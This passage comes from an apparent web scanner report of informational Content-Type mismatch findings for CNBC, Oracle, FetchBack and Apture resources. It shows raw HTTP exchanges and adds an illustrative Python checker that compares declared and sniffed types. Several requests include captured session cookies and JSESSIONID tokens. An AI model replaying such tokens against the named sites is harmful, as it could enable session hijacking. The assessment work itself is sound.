31.49. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response's Content-Type header states that it contains HTML (text/html; charset=UTF-8). However, the body is JavaScript (a document.write call that injects an iframe), fetched by the embedding page as a script.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrect HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 204

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+"><"+"/iframe"+">"
...[SNIP]...

31.50. http://l.apture.com/v3/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The response's Content-Type header states that it contains script (text/javascript). However, the body is the two-byte string {}, which the scanner classified as plain text (it is also a valid empty JSON object).

Request

GET /v3/?2=%7B%22keyword%22%3A%22ATG%20e-commerce%20solutio%22%2C%22engine%22%3A%22google%22%2C%22type%22%3A1130%2C%22siteId%22%3A192207%2C%22visitId%22%3A%2261fa95dde8b04fea813e6b6d7c001cc3%22%2C%22pageId%22%3A138100185%7D&AC=FQtL8KWd11&FI=af9c9728-972d-4d0e-a752-6b723d873326 HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
Origin: http://www.readwriteweb.com
X-REQUESTED-WITH: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Access-Control-Allow-Headers: ORIGIN, X-REQUESTED-WITH
Content-Length: 2
Date: Tue, 06 Sep 2011 15:32:54 GMT
Connection: close

{}

31.51. http://m.cnbc.com/mytest/ipecho.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://m.cnbc.com
Path:   /mytest/ipecho.php

Issue detail

The response's Content-Type header states that it contains HTML (text/html). The scanner's heuristic classified the body as CSS, but the body shown below is a JSONP callback invocation (getip({...});), i.e. script rather than HTML or CSS.

Request

GET /mytest/ipecho.php HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Cache-Control: max-age=1
Expires: Tue, 06 Sep 2011 14:57:01 GMT
Vary: Accept-Encoding
Content-Type: text/html
Via: 1.1 aicache6
Content-Length: 59
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20

getip({"ip": "64.210.193.254", "address":"50.23.123.106"});

31.52. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share.jpg/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.cnbc.com
Path:   /i/CNBC/CNBC_Images/video/cur_video_share.jpg/

Issue detail

The response's Content-Type header states that it contains HTML (text/html; charset=utf-8). The scanner's heuristic classified the body as XML; the body is the one-line HTML fragment <h1>404 Image Not Found</h1> returned by the 404 handler, so the declared type is in fact consistent with the content and this finding is a likely false positive.

Request

GET /i/CNBC/CNBC_Images/video/cur_video_share.jpg/ HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:04:56 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>
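
A checker for this class of finding, added here as an illustration and not part of the report or of the scanner that produced it: it sniffs a body by magic bytes and simple text heuristics, compares the result with the declared Content-Type, and notes whether the response would stop loading as a <script> under X-Content-Type-Options: nosniff (with nosniff, script destinations require a JavaScript MIME type). The classifier, the helper names and the sample responses are this example's own assumptions; the sample bodies mirror those visible in findings 31.45, 31.46, 31.47, 31.49, 31.50, 31.51 and 31.52 but are constructed, with example addresses substituted.

```python
import re

# Magic-byte signatures for the binary formats that appear in these findings.
MAGIC = (
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
)

# Media types treated as interchangeable when comparing declared vs. sniffed.
JS_TYPES = {"application/javascript", "application/x-javascript", "text/javascript"}


def sniff(body: bytes) -> str:
    """Coarse body classification: magic bytes first, then text heuristics.

    The heuristics are this example's own (an assumption), not the scanner's
    algorithm, so labels can differ from the report's wording.
    """
    for sig, mtype in MAGIC:
        if body.startswith(sig):
            return mtype
    text = body.decode("latin-1").strip()
    # CSS and JS files commonly open with a block comment; skip it before classifying.
    text = re.sub(r"^(/\*.*?\*/\s*)+", "", text, flags=re.S)
    if not text:
        return "empty"
    if re.match(r"[\w$.]+\s*\(\s*[\[{]", text):             # callback({...});  -> JSONP
        return "application/javascript"
    if text[0] in "{[":                                      # bare JSON value
        return "application/json"
    if re.match(r"<(!doctype|html|head|body|h[1-6]|div|p|script)\b", text, re.I):
        return "text/html"
    if text.startswith("<"):                                 # other markup
        return "application/xml"
    if re.search(r"\b(var|function|let|const)\b|\b(document|window|location)\.", text):
        return "application/javascript"
    if re.search(r"^[^{};]+\{[^{}]*:[^{}]*\}", text, re.S):  # selector { prop: value }
        return "text/css"
    return "text/plain"


def normalize(declared: str) -> str:
    """'text/html; charset=UTF-8' -> 'text/html'."""
    return declared.split(";", 1)[0].strip().lower()


def same_family(a: str, b: str) -> bool:
    return a == b or (a in JS_TYPES and b in JS_TYPES)


def check(name: str, headers: dict, body: bytes) -> dict:
    """Compare the declared Content-Type with the sniffed body type.

    blocked_as_script_if_nosniff is True when the response carries
    X-Content-Type-Options: nosniff and its declared type is not a JavaScript
    MIME type: a browser will then refuse to run it as a <script>.
    """
    h = {k.lower(): v for k, v in headers.items()}
    declared = normalize(h.get("content-type", ""))
    sniffed = sniff(body)
    nosniff = h.get("x-content-type-options", "").strip().lower() == "nosniff"
    return {
        "name": name,
        "declared": declared,
        "sniffed": sniffed,
        "mismatch": not same_family(declared, sniffed),
        "blocked_as_script_if_nosniff": nosniff and declared not in JS_TYPES,
    }


def find_mismatches(samples) -> list:
    return [r for r in (check(*s) for s in samples) if r["mismatch"]]


# Constructed sample responses (not captured traffic); bodies mirror the ones
# visible in findings 31.45-31.47 and 31.49-31.52 above, with example addresses.
SAMPLES = [
    ("spacer.gif", {"Content-Type": "text/plain"},
     b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04\x01\x00\x00\x00\x00,"
     b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"),
    ("style.css", {"Content-Type": "text/plain"},
     b"/* Global stylesheet */\nBODY,H1,H2,H3,H4 {font-family:arial,helvetica,sans-serif;}"),
    ("s_code_forums.js", {"Content-Type": "text/plain"},
     b'function s_setAccount(){\nvar s_account="";\nvar curUrl = location.href;\n}'),
    ("adtag.js", {"Content-Type": "text/html; charset=UTF-8"},
     b'document.write("<"+"iframe src=\'http://ads.example.invalid/imp?tid=1\' width=\'300\'"+"><"+"/iframe"+">");'),
    ("apture /v3/", {"Content-Type": "text/javascript"}, b"{}"),
    ("ipecho.php", {"Content-Type": "text/html"},
     b'getip({"ip": "192.0.2.10", "address":"198.51.100.20"});'),
    ("404 handler", {"Content-Type": "text/html; charset=utf-8"},
     b"<h1>404 Image Not Found</h1>"),
]

if __name__ == "__main__":
    for r in (check(*s) for s in SAMPLES):
        status = "MISMATCH" if r["mismatch"] else "ok"
        print(f"{r['name']:<18} declared={r['declared']:<16} sniffed={r['sniffed']:<23} {status}")
```

Run as a script, the 404 fragment comes out consistent (HTML declared, HTML sniffed) while the other six samples are flagged. None of the responses in this part of the report send X-Content-Type-Options: nosniff, so browsers still execute the scripts served as text/plain or text/html; adding nosniff without first correcting the Content-Type of those resources would break the pages that include them.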

31.53. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.cnbc.com
Path:   /i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/

Issue detail

The response's Content-Type header states that it contains HTML (text/html; charset=utf-8). The scanner's heuristic classified the body as XML; the body is the one-line HTML fragment <h1>404 Image Not Found</h1> returned by the 404 handler, so the declared type is in fact consistent with the content and this finding is a likely false positive.

Request

GET /i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/ HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:04:56 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.54. http://media.cnbc.com/i/CNBC/CNBC_Images/video/vid_control_/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.cnbc.com
Path:   /i/CNBC/CNBC_Images/video/vid_control_/

Issue detail

The response's Content-Type header states that it contains HTML (text/html; charset=utf-8). The scanner's heuristic classified the body as XML; the body is the one-line HTML fragment <h1>404 Image Not Found</h1> returned by the 404 handler, so the declared type is in fact consistent with the content and this finding is a likely false positive.

Request

GET /i/CNBC/CNBC_Images/video/vid_control_/ HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:04:56 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.55. http://media.cnbc.com/i/CNBC/Components/FlashVideo/flashVideoPlayerv81

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.cnbc.com
Path:   /i/CNBC/Components/FlashVideo/flashVideoPlayerv81

Issue detail

The response's Content-Type header states that it contains HTML (text/html; charset=utf-8). The scanner's heuristic classified the body as XML; the body is the one-line HTML fragment <h1>404 Image Not Found</h1> returned by the 404 handler, so the declared type is in fact consistent with the content and this finding is a likely false positive.

Request

GET /i/CNBC/Components/FlashVideo/flashVideoPlayerv81 HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:04:59 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.56. http://media.cnbc.com/i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.cnbc.com
Path:   /i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14

Issue detail

The response's Content-Type header states that it contains HTML (text/html; charset=utf-8). The scanner's heuristic classified the body as XML; the body is the one-line HTML fragment <h1>404 Image Not Found</h1> returned by the 404 handler, so the declared type is in fact consistent with the content and this finding is a likely false positive.

Request

GET /i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14 HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:05:00 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.57. http://media.cnbc.com/j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.cnbc.com
Path:   /j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel

Issue detail

The response's Content-Type header states that it contains HTML (text/html; charset=utf-8). The scanner's heuristic classified the body as XML; the body is the one-line HTML fragment <h1>404 Image Not Found</h1> returned by the 404 handler, so the declared type is in fact consistent with the content and this finding is a likely false positive.

Request

GET /j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel HTTP/1.1
Host: media.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 28
Date: Tue, 06 Sep 2011 15:05:00 GMT
Connection: close
Cache-Control: public, max-age=86400
X-N: S

<h1>404 Image Not Found</h1>

31.58. https://myprofile.oracle.com/EndUser/images/fading-background.png

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/fading-background.png

Issue detail

The response's Content-Type header states that it contains HTML (text/html). However, the body actually appears to be a PNG image: it begins with the PNG signature.

Request

GET /EndUser/images/fading-background.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_cc=true; s_nr=1315343797232; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleblogs%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:38 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30195555395017574,0)
Last-Modified: Fri, 11 Feb 2011 22:10:22 GMT
Content-Length: 164

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...FIDATx.b......01..(.x.....G.;.....QW~....h,.....FK...l$..._.}..:... ....G...U.....IEND.B`.

31.59. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/logo-oracle-red.png

Issue detail

The response's Content-Type header states that it contains HTML (text/html). However, the body actually appears to be a PNG image: it begins with the PNG signature.

Request

GET /EndUser/images/logo-oracle-red.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:21 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186767891789108,1)
Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT
Content-Length: 908

.PNG
.
...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M    ..{..........g.t..].Sd...]...D..d.3.............|.....
...[SNIP]...

31.60. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code.js

Issue detail

The response's Content-Type header states that it contains HTML (text/html). However, the body actually appears to be script (JavaScript).

Request

GET /EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:35 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=40;ecid=30186712057213538,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

31.61. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_popup.js

Issue detail

The response's Content-Type header states that it contains HTML (text/html). However, the body actually appears to be script (JavaScript).

Request

GET /EndUser/jscripts/s_code_popup.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:38 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 10:28:50 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=161;ecid=30186686287409627,0)
Content-Length: 233

var popupWindow = null;
var flag = 0;

function openPopup(url)
{
try
{
popupWindow = window.open(url, "popup_id", "scrollbars,resizable,width=800,height=600");
}
catch (err)
{
flag = '1' +
...[SNIP]...

31.62. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_profile.js

Issue detail

The response's Content-Type header states that it contains HTML (text/html). However, the body actually appears to be script (JavaScript).

Request

GET /EndUser/jscripts/s_code_profile.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:29:47 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=249;ecid=30186699172311517,0)
Content-Length: 1366

/* Setting the s_account */
function s_setAccount(){

var s_account="";

var curUrl = location.href;

if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index
...[SNIP]...

31.63. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_validation.js

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /EndUser/jscripts/s_validation.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
